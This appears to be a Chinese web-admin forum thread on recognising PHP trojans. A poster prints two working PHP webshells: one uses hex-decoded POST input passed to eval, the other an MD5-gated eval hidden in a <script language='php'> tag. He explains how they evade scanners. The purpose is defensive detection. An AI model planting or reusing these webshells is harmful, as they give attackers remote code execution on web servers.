帝国论坛
→
帝国网站管理系统交流区
→
模板/标签/插件共享交流
→
php木马的识别
【本版专题贴子】
主题:php木马的识别
[加入收藏夹]
jiuhecai
用户头衔:探花
精华贴 :0
发贴数 :3023
经验值 :8618
注册时间:2014-07-02
信息
搜索
好友
发送悄悄话
【
精益求精-帝国网站管理系统7.5正式版开源发布
】 [第
1
楼]
php木马的识别
多次遭遇,多次帮朋友查收。收集下来,供大家识别预防。
帝国插件
插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296
2021-10-13 21:24:46
已设置保密
顶部
回复
引用
报告
编辑
删除
jiuhecai
用户头衔:探花
精华贴 :0
发贴数 :3023
经验值 :8618
注册时间:2014-07-02
信息
搜索
好友
发送悄悄话
【
免费开源-EBMA系统:更安全的MYSQL管理和备份系统
】 [第
2
楼]
class _{
static public $phpcms=Null;
function __construct($l="error"){
self::$phpcms=$l;
@eval/*Defining error level offences*/(null.null.self::$phpcms);
}}
function hexToStr($hex){
$str="";
for($i=0;$i<strlen($hex)-1;$i+=2)
$str.=chr(hexdec($hex[$i].$hex[$i+1]));
return $str;
}
$error = null.hexToStr(@$_POST/*\*/["123"]);
$d = new _($error);
帝国插件
插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296
2021-10-13 21:26:59
已设置保密
顶部
回复
引用
报告
编辑
删除
bj114
用户头衔:探花
精华贴 :0
发贴数 :2807
经验值 :7816
注册时间:2012-04-09
信息
搜索
好友
发送悄悄话
【
精益求精-帝国网站管理系统7.5正式版开源发布
】 [第
3
楼]
哦哦
2021-10-13 21:43:30
已设置保密
顶部
回复
引用
报告
编辑
删除
jiuhecai
用户头衔:探花
精华贴 :0
发贴数 :3023
经验值 :8618
注册时间:2014-07-02
信息
搜索
好友
发送悄悄话
【
免费开源-EBMA系统:更安全的MYSQL管理和备份系统
】 [第
4
楼]
这个木马是一句话木马 <?php eval($_POST['123']);?> 的变种。
1. 木马中定义的函数 hexToStr 等同于 php内置的函数pack("H*",$str),重新定义的目的,是避开对敏感函数pack的扫描
2. 类中包含了敏感函数eval
3. 比如让post['123']='706870696e666f28293b'; 相当于执行 phpinfo();
帝国插件
插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296
2021-10-13 21:53:21
已设置保密
顶部
回复
引用
报告
编辑
删除
jiuhecai
用户头衔:探花
精华贴 :0
发贴数 :3023
经验值 :8618
注册时间:2014-07-02
信息
搜索
好友
发送悄悄话
【
精益求精-帝国网站管理系统7.5正式版开源发布
】 [第
5
楼]
下面这个依然是一句话的变种:
<script language='php'>if(md5($_GET['cmd'])=='50247d92877126ad5eccd526d1926521'){@eval($safe="$_POST[helensb]");}</script>
他采用了php代码的不常用标记<script language='php'>。
帝国插件
插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296
2021-10-14 07:48:48
已设置保密
顶部
回复
引用
报告
编辑
删除
cighsen02
用户头衔:进士
精华贴 :0
发贴数 :869
经验值 :3347
注册时间:2009-09-29
信息
搜索
好友
发送悄悄话
【
免费开源-EBMA系统:更安全的MYSQL管理和备份系统
】 [第
6
楼]
牛,解释透彻
要上就上安心站长
www.axzz.cn
q:365182575
2021-10-14 09:59:23
已设置保密
顶部
回复
引用
报告
编辑
删除
jiuhecai
用户头衔:探花
精华贴 :0
发贴数 :3023
经验值 :8618
注册时间:2014-07-02
信息
搜索
好友
发送悄悄话
【
精益求精-帝国网站管理系统7.5正式版开源发布
】 [第
7
楼]
发错了
[该贴被修改
1
次,最后修改时间
2021-10-20 08:07:22
]
帝国插件
插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296
2021-10-20 08:06:33
已设置保密
顶部
回复
引用
报告
编辑
删除
快速回复
内容
表情
使用EBB代码
使用smile代码
显示签名
自动分析url
自动分析img
【
进入高级模式
】
(按 Ctrl+Enter 直接提交)
顶部
加入收藏夹
关于帝国
|
广告服务
|
联系我们
|
法律声明
|
隐私条款
|
许可协议
Powered by:
EBB
Version 2.2.1